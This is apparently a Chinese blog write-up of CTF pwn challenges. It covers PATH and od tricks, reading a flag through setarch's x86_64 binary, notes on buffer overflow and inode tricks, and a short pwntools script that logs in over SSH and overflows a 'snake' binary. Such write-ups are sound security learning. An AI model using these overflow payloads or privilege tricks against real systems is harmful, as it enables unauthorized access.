env $PATH
od可以输出解八进制..学到了学到了

2 x64_64命令

1
2
3
4
5
6
7
8
9
10
11
ls -al /usr/bin/x86_64
setarch - change reported architecture in new program environment and/or set personality flags 

Welcome to Pwn-Game by TaQini.
Your ID:
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ x86_64
$ id
uid=1000(ctf) gid=1000(ctf) egid=1001(ctf_pwn) groups=1000(ctf)
$ cat flag
flag{e6e49208-5763-48d6-a32c-ba4992ea6fd1}

secret

爆破..?

官方:buf缓冲区溢出。猜对一次减1.

printf和system相差0x10从而利用覆盖system

rci

考察点 inode

ls -ali /tmp

$0

snake_dyn

登陆密码扫码

getName用了strncpy如果输出大于0x100可以得到flag

1
2
3
4
5
6
7
from pwn import *

s = ssh(host='node3.buuoj.cn',user='ctf',password='sNaKes',port=26396)
p = s.process('/home/ctf/snake')
payload = 'a' * 0x100
p.sendline(payload)
p.interactive()

总结

难度不是很大。脑洞考察比较多。新人还是可以试着做一下的。

谢谢你请我吃糖果

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

本blog记录个人日常,分享一些经济,网安,开发等内容。联系邮箱lyxp1314@126.com